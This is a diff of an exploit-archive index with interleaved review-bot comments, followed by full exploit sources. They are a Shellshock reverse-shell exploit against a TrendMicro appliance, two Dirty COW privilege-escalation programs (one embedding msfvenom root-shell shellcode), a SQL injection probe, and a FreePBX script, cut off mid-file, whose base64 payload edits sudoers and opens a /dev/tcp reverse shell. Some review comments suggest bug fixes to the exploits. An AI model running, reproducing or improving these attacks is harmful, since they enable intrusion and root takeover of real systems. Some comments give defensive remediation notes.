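Review bot: the rename of 14733 in this hunk drops the word "Hijacking": `14733,platforms/windows/local/14733.c,"Microsoft Windows 7 - 'wab32res.dll' wab.exe DLL"` no longer says what the entry is, while every other renamed row here ends in "DLL Hijacking". It should read "Microsoft Windows 7 - 'wab32res.dll' wab.exe DLL Hijacking" (or drop "wab.exe" and match the 14745 / 14778 wording). The same normalization is also missed for 14751, which keeps the old parenthesized form "Microsoft Vista - (fveapi.dll) BitLocker Drive Encryption API Hijacking Exploit" although its neighbours were converted to the quoted-DLL-name form without the "Exploit" suffix. Pre-existing but visible in these rows: several author fields carry a trailing space ("Glafkos Charalambous ", "Encrypt3d.M!nd ") that a follow-up cleanup could strip.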
@ -27786,7 +27786,7 @@ id,file,description,date,author,platform,type,port
30762,platforms/php/webapps/30762.txt,"WordPress Plugin WP-SlimStat 0.9.2 - Cross-Site Scripting",2007-11-13,"Fracesco Vaj",php,webapps,0
30763,platforms/linux/dos/30763.php,"KDE Konqueror 3.5.6 - Cookie Handling Denial of Service",2007-11-14,"laurent gaffie",linux,dos,0
30764,platforms/php/webapps/30764.txt,"CONTENTCustomizer 3.1 - Dialog.php Unauthorized Access",2007-11-14,d3hydr8,php,webapps,0
40602,platforms/windows/dos/40602.html,"Microsoft Edge - Array.map Heap Overflow (MS16-119)",2016-10-20,"Google Security Research",windows,dos,0
40602,platforms/windows/dos/40602.html,"Microsoft Edge - 'Array.map' Heap Overflow (MS16-119)",2016-10-20,"Google Security Research",windows,dos,0
30766,platforms/linux/dos/30766.c,"GNU TAR 1.15.91 / CPIO 2.5.90 - safer_name_suffix Remote Denial of Service",2007-11-14,"Dmitry V. Levin",linux,dos,0
30767,platforms/windows/dos/30767.html,"Apple Safari 3.0.x - for Windows Document.Location.Hash Buffer Overflow",2007-06-25,"Azizov E",windows,dos,0
30768,platforms/multiple/remote/30768.txt,"IBM Websphere Application Server 5.1.1 - WebContainer HTTP Request Header Security",2007-11-15,anonymous,multiple,remote,0
@ -27794,7 +27794,7 @@ id,file,description,date,author,platform,type,port
30770,platforms/cgi/webapps/30770.txt,"AIDA Web - Frame.HTML Multiple Unauthorized Access Vulnerabilities",2007-11-14,"MC Iglo",cgi,webapps,0
30771,platforms/multiple/remote/30771.txt,"Aruba MC-800 Mobility Controller - Screens Directory HTML Injection",2007-11-15,"Jan Fry",multiple,remote,0
30772,platforms/windows/remote/30772.html,"ComponentOne FlexGrid 7.1 - ActiveX Control Multiple Buffer Overflow Vulnerabilities",2007-11-15,"Elazar Broad",windows,remote,0
40604,platforms/windows/dos/40604.html,"Microsoft Edge - Array.join Info Leak (MS16-119)",2016-10-20,"Google Security Research",windows,dos,0
40604,platforms/windows/dos/40604.html,"Microsoft Edge - 'Array.join' Infomation Leak (MS16-119)",2016-10-20,"Google Security Research",windows,dos,0
30774,platforms/php/webapps/30774.txt,"Liferay Portal 4.1 Login Script - Cross-Site Scripting",2007-11-16,"Adrian Pastor",php,webapps,0
30775,platforms/asp/webapps/30775.txt,"JiRo's Banner System 2.0 - 'login.asp' Multiple SQL Injection",2007-11-17,"Aria-Security Team",asp,webapps,0
30776,platforms/linux/dos/30776.txt,"LIVE555 Media Server 2007.11.1 - ParseRTSPRequestString Remote Denial Of Service",2007-11-19,"Luigi Auriemma",linux,dos,0
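Review bot: the new description for 40604 introduces a spelling error: "'Array.join' Infomation Leak (MS16-119)" should be "'Array.join' Information Leak (MS16-119)". The old title's abbreviation "Info Leak" was at least spelled correctly; if the intent is to expand it, use the full word.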
@ -28252,7 +28252,7 @@ id,file,description,date,author,platform,type,port
31282,platforms/php/webapps/31282.txt,"XOOPS Tiny Event 1.01 - 'print' Option SQL Injection",2008-02-21,S@BUN,php,webapps,0
31283,platforms/php/webapps/31283.txt,"PHP-Nuke Downloads Module - 'sid' Parameter SQL Injection",2008-02-21,S@BUN,php,webapps,0
31284,platforms/php/webapps/31284.txt,"XOOPS 'prayerlist' Module - 'cid' Parameter SQL Injection",2008-02-21,S@BUN,php,webapps,0
40355,platforms/multiple/dos/40355.txt,"Adobe Flash - Transform.colorTranform Getter Info Leak",2016-09-08,"Google Security Research",multiple,dos,0
40355,platforms/multiple/dos/40355.txt,"Adobe Flash - Transform.colorTranform Getter Infomation Leak",2016-09-08,"Google Security Research",multiple,dos,0
31285,platforms/multiple/dos/31285.txt,"Zilab Chat and Instant Messaging (ZIM) 2.0/2.1 Server - Multiple Vulnerabilities",2008-02-21,"Luigi Auriemma",multiple,dos,0
31286,platforms/asp/webapps/31286.txt,"Citrix Metaframe Web Manager - 'login.asp' Cross-Site Scripting",2008-02-22,Handrix,asp,webapps,0
31287,platforms/php/webapps/31287.txt,"PHP-Nuke Recipe Module 1.3 - 'recipeid' Parameter SQL Injection",2008-02-23,S@BUN,php,webapps,0
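Review bot: same typo here: the new description for 40355 reads "Transform.colorTranform Getter Infomation Leak" and should say "Information Leak". Since this commit is the one introducing the misspelling into three renamed rows, fix it before merging rather than in a later rename pass.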
@ -36677,9 +36677,9 @@ id,file,description,date,author,platform,type,port
40569,platforms/java/webapps/40569.txt,"ManageEngine ServiceDesk Plus 9.2 Build 9207 - Unauthorized Information Disclosure",2016-10-18,p0z,java,webapps,0
40570,platforms/osx/dos/40570.py,"The Unarchiver 3.11.1 - '.tar.Z' Crash PoC",2016-10-18,"Antonio Z.",osx,dos,0
40571,platforms/cgi/webapps/40571.pl,"Cgiemail 1.6 - Source Code Disclosure",2016-10-18,"Finbar Crago",cgi,webapps,80
40572,platforms/windows/local/40572.cs,"Windows DFS Client Driver - Arbitrary Drive Mapping Privilege Escalation (MS16-123)",2016-10-18,"Google Security Research",windows,local,0
40573,platforms/windows/local/40573.cs,"Windows DeviceApi CMApi - PiCMOpenDeviceKey Arbitrary Registry Key Write Privilege Escalation (MS16-124)",2016-10-18,"Google Security Research",windows,local,0
40574,platforms/windows/local/40574.cs,"Windows DeviceApi CMApi - User Hive Impersonation Privilege Escalation (MS16-124)",2016-10-18,"Google Security Research",windows,local,0
40572,platforms/windows/local/40572.cs,"Microsoft Windows - DFS Client Driver Arbitrary Drive Mapping Privilege Escalation (MS16-123)",2016-10-18,"Google Security Research",windows,local,0
40573,platforms/windows/local/40573.cs,"Microsoft Windows - DeviceApi CMApi PiCMOpenDeviceKey Arbitrary Registry Key Write Privilege Escalation (MS16-124)",2016-10-18,"Google Security Research",windows,local,0
40574,platforms/windows/local/40574.cs,"Microsoft Windows - DeviceApi CMApi User Hive Impersonation Privilege Escalation (MS16-124)",2016-10-18,"Google Security Research",windows,local,0
40576,platforms/php/webapps/40576.py,"XhP CMS 0.5.1 - Cross-Site Request Forgery / Persistent Cross-Site Scripting",2016-10-19,"Ahsan Tahir",php,webapps,0
40577,platforms/windows/local/40577.txt,"IObit Advanced SystemCare 10.0.2 - Unquoted Service Path Privilege Escalation",2016-10-19,Amir.ght,windows,local,0
40578,platforms/windows/local/40578.py,"HikVision Security Systems - Activex Buffer Overflow",2016-10-19,"Yuriy Gurkin",windows,local,0
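
Review bot: the 40578 title spells the technology as "Activex" while the rest of files.csv writes "ActiveX"; since this hunk is already retitling 40572-40574 for consistency, fix the casing in the same change. It is also worth confirming the platform/type columns for that row: an ActiveX buffer overflow is normally a client-side bug reached through a browser, and windows/local suggests a local privilege escalation, so if the file is a local PoC the title should say so.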
@ -36702,14 +36702,21 @@ id,file,description,date,author,platform,type,port
40595,platforms/php/webapps/40595.txt,"SPIP 3.1.2 Template Compiler/Composer - PHP Code Execution",2016-10-20,Sysdream,php,webapps,80
40596,platforms/php/webapps/40596.txt,"SPIP 3.1.1 / 3.1.2 - File Enumeration / Path Traversal",2016-10-20,Sysdream,php,webapps,80
40597,platforms/php/webapps/40597.txt,"SPIP 3.1.2 - Cross-Site Request Forgery",2016-10-20,Sysdream,php,webapps,80
40598,platforms/windows/dos/40598.txt,"Windows win32k.sys - TTF Processing RCVT TrueType Instruction Handler Out-of-Bounds Read (MS16-120)",2016-10-20,"Google Security Research",windows,dos,0
40599,platforms/windows/dos/40599.txt,"Windows win32k.sys - TTF Processing win32k!sbit_Embolden / win32k!ttfdCloseFontContext Use-After-Free (MS16-120)",2016-10-20,"Google Security Research",windows,dos,0
40600,platforms/windows/dos/40600.txt,"Windows Kernel - Registry Hive Loading Negative RtlMoveMemory Size in nt!CmpCheckValueList (MS16-124)",2016-10-20,"Google Security Research",windows,dos,0
40601,platforms/windows/dos/40601.txt,"Windows Kernel - Registry Hive Loading Relative Arbitrary Read in nt!RtlValidRelativeSecurityDescriptor (MS16-123)",2016-10-20,"Google Security Research",windows,dos,0
40603,platforms/windows/dos/40603.html,"Microsoft Edge - Function.apply Info Leak (MS16-119)",2016-10-20,"Google Security Research",windows,dos,0
40598,platforms/windows/dos/40598.txt,"Microsoft Windows - 'win32k.sys' TTF Processing RCVT TrueType Instruction Handler Out-of-Bounds Read (MS16-120)",2016-10-20,"Google Security Research",windows,dos,0
40599,platforms/windows/dos/40599.txt,"Microsoft Windows - 'win32k.sys' TTF Processing win32k!sbit_Embolden / win32k!ttfdCloseFontContext Use-After-Free (MS16-120)",2016-10-20,"Google Security Research",windows,dos,0
40600,platforms/windows/dos/40600.txt,"Microsoft Windows Kernel - Registry Hive Loading Negative RtlMoveMemory Size in nt!CmpCheckValueList (MS16-124)",2016-10-20,"Google Security Research",windows,dos,0
40601,platforms/windows/dos/40601.txt,"Microsoft Windows Kernel - Registry Hive Loading Relative Arbitrary Read in nt!RtlValidRelativeSecurityDescriptor (MS16-123)",2016-10-20,"Google Security Research",windows,dos,0
40603,platforms/windows/dos/40603.html,"Microsoft Edge - Function.apply Infomation Leak (MS16-119)",2016-10-20,"Google Security Research",windows,dos,0
40605,platforms/windows/dos/40605.html,"Microsoft Edge - Spread Operator Stack Overflow (MS16-119)",2016-10-20,"Google Security Research",windows,dos,0
40606,platforms/windows/local/40606.cpp,"Windows Edge/IE - Isolated Private Namespace Insecure DACL Privilege Escalation (MS16-118)",2016-10-20,"Google Security Research",windows,local,0
40607,platforms/windows/local/40607.cpp,"Windows Edge/IE - Isolated Private Namespace Insecure Boundary Descriptor Privilege Escalation (MS16-118)",2016-10-20,"Google Security Research",windows,local,0
40606,platforms/windows/local/40606.cpp,"Microsoft Windows Edge/Internet Explorer - Isolated Private Namespace Insecure DACL Privilege Escalation (MS16-118)",2016-10-20,"Google Security Research",windows,local,0
40607,platforms/windows/local/40607.cpp,"Microsoft Windows Edge/Internet Explorer - Isolated Private Namespace Insecure Boundary Descriptor Privilege Escalation (MS16-118)",2016-10-20,"Google Security Research",windows,local,0
40608,platforms/windows/local/40608.cs,"Windows - NtLoadKeyEx Read Only Hive Arbitrary File Write Privilege Escalation (MS16-124)",2016-10-20,"Google Security Research",windows,local,0
40609,platforms/linux/remote/40609.rb,"Hak5 WiFi Pineapple - Preconfiguration Command Injection (Metasploit)",2016-10-20,Metasploit,linux,remote,1471
40610,platforms/linux/remote/40610.rb,"OpenNMS - Java Object Unserialization Remote Code Execution (Metasploit)",2016-10-20,Metasploit,linux,remote,1099
40611,platforms/linux/local/40611.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' Race Condition Privilege Escalation (Write Access)",2016-10-19,"Phil Oester",linux,local,0
40612,platforms/php/webapps/40612.txt,"Just Dial Clone Script - SQL Injection",2016-10-21,"Arbin Godar",php,webapps,0
40614,platforms/php/webapps/40614.py,"FreePBX 10.13.66 - Remote Command Execution / Privilege Escalation",2016-10-21,"Christopher Davis",php,webapps,0
40617,platforms/windows/dos/40617.txt,"RealPlayer 18.1.5.705 - '.QCP' Crash (PoC)",2016-10-21,"Alwin Peppels",windows,dos,0
40616,platforms/linux/local/40616.c,"Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW' Race Condition Privilege Escalation (SUID)",2016-10-21,"Robin Verton",linux,local,0
40618,platforms/windows/dos/40618.py,"Oracle VM VirtualBox 4.3.28 - '.ovf' Crash (PoC)",2016-10-21,"sultan albalawi",windows,dos,0
40619,platforms/hardware/remote/40619.py,"TrendMicro InterScan Web Security Virtual Appliance - Remote Code Execution (Shellshock)",2016-10-21,"Hacker Fantastic",hardware,remote,0
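
Review bot: the renamed 40603 entry introduces a typo, "Function.apply Infomation Leak", where the line it replaces had "Info Leak"; the new title should read "Information Leak". The added rows also break the id ordering the rest of the file keeps: 40617 (RealPlayer '.QCP' crash) is inserted before 40616 (the Dirty COW SUID variant). 40611 carries the date 2016-10-19 while the other additions in this batch are dated 2016-10-21; that is fine if it is the original disclosure date, otherwise it should match the rest.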


@ -0,0 +1,63 @@
#!/usr/bin/env python
# TrendMicro InterScan Web Security Virtul Appliance
# ==================================================
# InterScan Web Security is a software virtual appliance that
# dynamically protects against the ever-growing flood of web
# threats at the Internet gateway exclusively designed to secure
# you against traditional and emerging web threats at the Internet
# gateway. The appliance however is shipped with a vulnerable
# version of Bash susceptible to shellshock (I know right?). An
# attacker can exploit this vulnerability by calling the CGI
# shellscript "/cgi-bin/cgiCmdNotify" which can be exploited
# to perform arbitrary code execution. A limitation of this
# vulnerability is that the attacker must have credentials for
# the admin web interface to exploit this flaw. The panel runs
# over HTTP by default so a man-in-the-middle attack could be
# used to gain credentials and compromise the appliance.
#
# $ python trendmicro_IWSVA_shellshock.py 192.168.56.101 admin password 192.168.56.1
# [+] TrendMicro InterScan Web Security Virtual Appliance CVE-2014-6271 exploit
# [-] Authenticating to '192.168.56.101' with 'admin' 'password'
# [-] JSESSIONID = DDE38E62757ADC00A51311F1F953EEBA
# [-] exploiting shellshock CVE-2014-6271...
# bash: no job control in this shell
# bash-4.1$ id
# uid=498(iscan) gid=499(iscan) groups=499(iscan)
#
# -- Hacker Fantastic
#
# (https://www.myhackerhouse.com)
import SimpleHTTPServer
import subprocess
import requests
import sys
import os
def spawn_listener():
os.system("nc -l 8080")
def shellshock(ip,session,cbip):
user_agent = {'User-agent': '() { :; }; /bin/bash -i >& /dev/tcp/'+cbip+'/8080 0>&1'}
cookies = {'JSESSIONID': session}
print "[-] exploiting shellshock CVE-2014-6271..."
myreq = requests.get("http://"+ip+":1812/cgi-bin/cgiCmdNotify", headers = user_agent, cookies = cookies)
def login_http(ip,user,password):
mydata = {'wherefrom':'','wronglogon':'no','uid':user, 'passwd':password,'pwd':'Log+On'}
print "[-] Authenticating to '%s' with '%s' '%s'" % (ip,user,password)
myreq = requests.post("http://"+ip+":1812/uilogonsubmit.jsp", data=mydata)
session_cookie = myreq.history[0].cookies.get('JSESSIONID')
print "[-] JSESSIONID = %s" % session_cookie
return session_cookie
if __name__ == "__main__":
print "[+] TrendMicro InterScan Web Security Virtual Appliance CVE-2014-6271 exploit"
if len(sys.argv) < 5:
print "[-] use with <ip> <user> <pass> <connectback_ip>"
sys.exit()
newRef=os.fork()
if newRef==0:
spawn_listener()
else:
session = login_http(sys.argv[1],sys.argv[2],sys.argv[3])
shellshock(sys.argv[1],session,sys.argv[4])
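
Review bot: login_http reads myreq.history[0].cookies without checking that the POST actually redirected, so a wrong password or a non-redirecting response ends in an IndexError rather than a clear "authentication failed" message; test `myreq.history` and the returned JSESSIONID before calling shellshock. The imports of SimpleHTTPServer and subprocess are unused, `myreq` in shellshock is assigned and never read, and the forked child that runs the listener is never waited on, so the parent exits and leaves it orphaned. The header also has "Virtul" for "Virtual". For the description itself, the header already states the two facts defenders need: the CGI is only reachable with admin credentials, and the root cause is the unpatched bash shipped in the appliance (CVE-2014-6271), so the remediation is the vendor bash update plus serving the admin panel over HTTPS to close the credential-sniffing path the header describes.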

platforms/linux/local/40611.c Executable file

@ -0,0 +1,110 @@
/*
####################### dirtyc0w.c #######################
$ sudo -s
# echo this is not a test > foo
# chmod 0404 foo
$ ls -lah foo
-r-----r-- 1 root root 19 Oct 20 15:23 foo
$ cat foo
this is not a test
$ gcc -lpthread dirtyc0w.c -o dirtyc0w
$ ./dirtyc0w foo m00000000000000000
mmap 56123000
madvise 0
procselfmem 1800000000
$ cat foo
m00000000000000000
####################### dirtyc0w.c #######################
*/
#include <stdio.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <pthread.h>
#include <unistd.h>
#include <sys/stat.h>
#include <string.h>
void *map;
int f;
struct stat st;
char *name;
void *madviseThread(void *arg)
{
char *str;
str=(char*)arg;
int i,c=0;
for(i=0;i<100000000;i++)
{
/*
You have to race madvise(MADV_DONTNEED) :: https://access.redhat.com/security/vulnerabilities/2706661
> This is achieved by racing the madvise(MADV_DONTNEED) system call
> while having the page of the executable mmapped in memory.
*/
c+=madvise(map,100,MADV_DONTNEED);
}
printf("madvise %d\n\n",c);
}
void *procselfmemThread(void *arg)
{
char *str;
str=(char*)arg;
/*
You have to write to /proc/self/mem :: https://bugzilla.redhat.com/show_bug.cgi?id=1384344#c16
> The in the wild exploit we are aware of doesn't work on Red Hat
> Enterprise Linux 5 and 6 out of the box because on one side of
> the race it writes to /proc/self/mem, but /proc/self/mem is not
> writable on Red Hat Enterprise Linux 5 and 6.
*/
int f=open("/proc/self/mem",O_RDWR);
int i,c=0;
for(i=0;i<100000000;i++) {
/*
You have to reset the file pointer to the memory position.
*/
lseek(f,map,SEEK_SET);
c+=write(f,str,strlen(str));
}
printf("procselfmem %d\n\n", c);
}
int main(int argc,char *argv[])
{
/*
You have to pass two arguments. File and Contents.
*/
if (argc<3)return 1;
pthread_t pth1,pth2;
/*
You have to open the file in read only mode.
*/
f=open(argv[1],O_RDONLY);
fstat(f,&st);
name=argv[1];
/*
You have to use MAP_PRIVATE for copy-on-write mapping.
> Create a private copy-on-write mapping. Updates to the
> mapping are not visible to other processes mapping the same
> file, and are not carried through to the underlying file. It
> is unspecified whether changes made to the file after the
> mmap() call are visible in the mapped region.
*/
/*
You have to open with PROT_READ.
*/
map=mmap(NULL,st.st_size,PROT_READ,MAP_PRIVATE,f,0);
printf("mmap %x\n\n",map);
/*
You have to do it on two threads.
*/
pthread_create(&pth1,NULL,madviseThread,argv[1]);
pthread_create(&pth2,NULL,procselfmemThread,argv[2]);
/*
You have to wait for the threads to finish.
*/
pthread_join(pth1,NULL);
pthread_join(pth2,NULL);
return 0;
}
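
Review bot: madviseThread and procselfmemThread are declared `void *` but fall off the end without a return statement, which is undefined behaviour in C; they should `return NULL`. `lseek(f,map,SEEK_SET)` passes a `void *` where an `off_t` is expected and needs an explicit cast, and `printf("mmap %x\n\n",map)` prints a pointer with `%x`, which truncates on 64-bit; use `%p`. Neither open() nor mmap() is checked for failure, so an unreadable target file produces a meaningless madvise/write count instead of an error, and the `str` parameter of madviseThread is unused. The header's pointers to the Red Hat advisory and bug 1384344 are the useful part of this file for defenders: the flaw is in the kernel's copy-on-write handling, so the only real fix is a patched kernel, and the behaviour to look for is a process hammering madvise(MADV_DONTNEED) and /proc/self/mem writes in a tight loop against a read-only, privately mapped file.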

platforms/linux/local/40616.c Executable file

@ -0,0 +1,156 @@
/*
* (un)comment correct payload first (x86 or x64)!
*
* $ gcc cowroot.c -o cowroot -pthread
* $ ./cowroot
* DirtyCow root privilege escalation
* Backing up /usr/bin/passwd.. to /tmp/bak
* Size of binary: 57048
* Racing, this may take a while..
* /usr/bin/passwd is overwritten
* Popping root shell.
* Don't forget to restore /tmp/bak
* thread stopped
* thread stopped
* root@box:/root/cow# id
* uid=0(root) gid=1000(foo) groups=1000(foo)
*/
#include <stdio.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <pthread.h>
#include <string.h>
#include <unistd.h>
void *map;
int f;
int stop = 0;
struct stat st;
char *name;
pthread_t pth1,pth2,pth3;
// change if no permissions to read
char suid_binary[] = "/usr/bin/passwd";
/*
* $ msfvenom -p linux/x64/exec CMD=/bin/bash PrependSetuid=True -f elf | xxd -i
*/
unsigned char sc[] = {
0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00,
0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,
0xb1, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xea, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x48, 0x31, 0xff, 0x6a, 0x69, 0x58, 0x0f, 0x05, 0x6a, 0x3b, 0x58, 0x99,
0x48, 0xbb, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00, 0x53, 0x48,
0x89, 0xe7, 0x68, 0x2d, 0x63, 0x00, 0x00, 0x48, 0x89, 0xe6, 0x52, 0xe8,
0x0a, 0x00, 0x00, 0x00, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x62, 0x61, 0x73,
0x68, 0x00, 0x56, 0x57, 0x48, 0x89, 0xe6, 0x0f, 0x05
};
unsigned int sc_len = 177;
/*
* $ msfvenom -p linux/x86/exec CMD=/bin/bash PrependSetuid=True -f elf | xxd -i
unsigned char sc[] = {
0x7f, 0x45, 0x4c, 0x46, 0x01, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00,
0x54, 0x80, 0x04, 0x08, 0x34, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x34, 0x00, 0x20, 0x00, 0x01, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x80, 0x04, 0x08, 0x00, 0x80, 0x04, 0x08, 0x88, 0x00, 0x00, 0x00,
0xbc, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00,
0x31, 0xdb, 0x6a, 0x17, 0x58, 0xcd, 0x80, 0x6a, 0x0b, 0x58, 0x99, 0x52,
0x66, 0x68, 0x2d, 0x63, 0x89, 0xe7, 0x68, 0x2f, 0x73, 0x68, 0x00, 0x68,
0x2f, 0x62, 0x69, 0x6e, 0x89, 0xe3, 0x52, 0xe8, 0x0a, 0x00, 0x00, 0x00,
0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x62, 0x61, 0x73, 0x68, 0x00, 0x57, 0x53,
0x89, 0xe1, 0xcd, 0x80
};
unsigned int sc_len = 136;
*/
void *madviseThread(void *arg)
{
char *str;
str=(char*)arg;
int i,c=0;
for(i=0;i<1000000 && !stop;i++) {
c+=madvise(map,100,MADV_DONTNEED);
}
printf("thread stopped\n");
}
void *procselfmemThread(void *arg)
{
char *str;
str=(char*)arg;
int f=open("/proc/self/mem",O_RDWR);
int i,c=0;
for(i=0;i<1000000 && !stop;i++) {
lseek(f,map,SEEK_SET);
c+=write(f, str, sc_len);
}
printf("thread stopped\n");
}
void *waitForWrite(void *arg) {
char buf[sc_len];
for(;;) {
FILE *fp = fopen(suid_binary, "rb");
fread(buf, sc_len, 1, fp);
if(memcmp(buf, sc, sc_len) == 0) {
printf("%s is overwritten\n", suid_binary);
break;
}
fclose(fp);
sleep(1);
}
stop = 1;
printf("Popping root shell.\n");
printf("Don't forget to restore /tmp/bak\n");
system(suid_binary);
}
int main(int argc,char *argv[]) {
char *backup;
printf("DirtyCow root privilege escalation\n");
printf("Backing up %s.. to /tmp/bak\n", suid_binary);
asprintf(&backup, "cp %s /tmp/bak", suid_binary);
system(backup);
f = open(suid_binary,O_RDONLY);
fstat(f,&st);
printf("Size of binary: %d\n", st.st_size);
char payload[st.st_size];
memset(payload, 0x90, st.st_size);
memcpy(payload, sc, sc_len+1);
map = mmap(NULL,st.st_size,PROT_READ,MAP_PRIVATE,f,0);
printf("Racing, this may take a while..\n");
pthread_create(&pth1, NULL, &madviseThread, suid_binary);
pthread_create(&pth2, NULL, &procselfmemThread, payload);
pthread_create(&pth3, NULL, &waitForWrite, NULL);
pthread_join(pth3, NULL);
return 0;
}
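
Review bot: `memcpy(payload, sc, sc_len+1)` copies 178 bytes from an array of 177, a one-byte out-of-bounds read; the `+1` should go. In waitForWrite the fopen result is never checked for NULL before fread, and on the successful path the `break` skips fclose, so the handle leaks. `sc_len` is a hand-maintained constant rather than `sizeof(sc)`, which is why the "(un)comment correct payload first" instruction in the header requires editing two places. From the defender's side the file documents its own footprint: it replaces /usr/bin/passwd on disk and leaves a copy in /tmp/bak, which is exactly what package verification (rpm -V, debsums) and file-integrity monitoring flag, and a setuid binary whose content no longer matches its package is the artefact to alert on.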

platforms/php/webapps/40612.txt Executable file

@ -0,0 +1,12 @@
# Exploit Title: SQL Injection in Just Dial Clone Script
# Date: 20 October 2016
# Exploit Author: Arbin Godar
# Website : ArbinGodar.com
# Vendor: http://www.i-netsolution.com/
*----------------------------------------------------------------------------------------------------------------------*
# Proof of Concept SQL Injection/Exploit :
http://localhost/[PATH]/category-view-list.php?srch=PoC%27
*----------------------------------------------------------------------------------------------------------------------*
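
Review bot: the advisory has no affected version, CVE, or vendor response, and the proof of concept is only a single-quote probe (`srch=PoC%27`) with no sample of the resulting database error or extracted data, so as written it shows a malformed query rather than demonstrating injection; include the affected version and the observed error output. The affected input is the `srch` parameter of category-view-list.php, and the fix on the vendor side is a parameterized query for that lookup.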

platforms/php/webapps/40614.py Executable file

@ -0,0 +1,112 @@
#!/usr/bin/env python
'''
Title | FreePBX 13 Remote Command Execution and Privilege Escalation
Date | 10/21/2016
Author | Christopher Davis
Vendor | https://www.freepbx.org/
Version | FreePBX 13 & 14 (System Recordings Module versions: 13.0.1beta1 - 13.0.26)
Tested on | http://downloads.freepbxdistro.org/ISO/FreePBX-64bit-10.13.66.iso
http://downloads.freepbxdistro.org/ISO/FreePBX-32bit-10.13.66.iso
Purpose | This script exploits the freepbx website, elevates privileges and returns a reverse bind tcp as root
Usage | python pbx.py -u http://10.2.2.109 -l 10.2.2.115 -p 4444 -s r
Orig Author | pgt - nullsecurity.net
'''
import re
import subprocess
import argparse
import random
import time
import socket
import threading
#This portion will check for requests and prompt user to install it if not already
try:
import requests
except:
try:
while True:
choice = raw_input('Requests library not found but is needed. Install? \'Y\'es or \'N\'o?\n:')
if choice.lower() == 'y':
subprocess.call('pip install requests',shell=True)
import requests
break
elif choice.lower() == 'n':
exit()
else:
continue
except Exception as e:
print(e)
exit()
#Since subprocess.call will bind, we start this thread sepparate to execute after our netcat bind
def delayGet():
global args
try:
time.sleep(5)
requests.get(args.url+ '0x4148.php.call', verify=False)
except:
pass
if __name__ == '__main__':
try:
parser = argparse.ArgumentParser()
parser.add_argument('-u', type=str, help='hostname and path. Ex- http://192.168.1.1/path/', dest='url')
parser.add_argument('-l', type=str, help='localhost ip to listen on', dest='lhost')
parser.add_argument('-p', type=str, help='port to listen on', dest='lport')
parser.add_argument('-s', type=str, help="'L'ocal or 'R'oot shell attempt", dest='shell')
parser.add_help
args = parser.parse_args()
#Make sure args were passed
if args.url == None or args.lhost == None or args.lport == None or not bool(re.search(r'^(?:[L|l]|[r|R])$', args.shell)):
parser.print_help()
print("\nUsage: python freepbx.py -u http://10.2.2.109 -l 10.2.2.115 -p 4444")
exit()
#Make sure the http url is there
if bool(re.search('[hH][tT][tT][pP][sS]?\:\/\/', args.url)) == False:
print('There is something wrong with your url. It needs to have http:// or https://\n\n')
exit()
#make sure / is there, if not, put it there
if args.url[-1:] != '/':
args.url += '/'
#python -c 'import pty; pty.spawn("/bin/sh")'
#this is the php we will upload to get a reverse shell. System call to perform reverse bash shell. Nohup spawns a new process in case php dies
#if version 13, lets try to get root, otherwise
if args.shell.upper() == 'R':
cmdshell = '<?php fwrite(fopen("hackerWAShere.py","w+"),base64_decode("IyEvdXNyL2Jpbi9lbnYgcHl0aG9uDQppbXBvcnQgc3VicHJvY2Vzcw0KaW1wb3J0IHRpbWUNCiMgLSotIGNvZGluZzogdXRmLTggLSotIA0KY21kID0gJ3NlZCAtaSBcJ3MvQ29tIEluYy4vQ29tIEluYy5cXG5lY2hvICJhc3RlcmlzayBBTEw9XChBTExcKVwgICcgXA0KCSdOT1BBU1NXRFw6QUxMIlw+XD5cL2V0Y1wvc3Vkb2Vycy9nXCcgL3Zhci9saWIvJyBcDQoJJ2FzdGVyaXNrL2Jpbi9mcmVlcGJ4X2VuZ2luZScNCnN1YnByb2Nlc3MuY2FsbChjbWQsIHNoZWxsPVRydWUpDQpzdWJwcm9jZXNzLmNhbGwoJ2VjaG8gYSA+IC92YXIvc3Bvb2wvYXN0ZXJpc2svc3lzYWRtaW4vYW1wb3J0YWxfcmVzdGFydCcsIHNoZWxsPVRydWUpDQp0aW1lLnNsZWVwKDIwKQ==")); system("python hackerWAShere.py; nohup sudo bash -i >& /dev/tcp/'+args.lhost+'/'+args.lport+' 0>&1 ");?>'
else:
cmdshell = "<?php system('nohup bash -i >& /dev/tcp/"+args.lhost+"/"+args.lport+" 0>&1 ');?>"
#creates a session
session = requests.Session()
print('\nStarting Session')
session.get(args.url, verify=False)
print('\nScraping the site for a cookie')
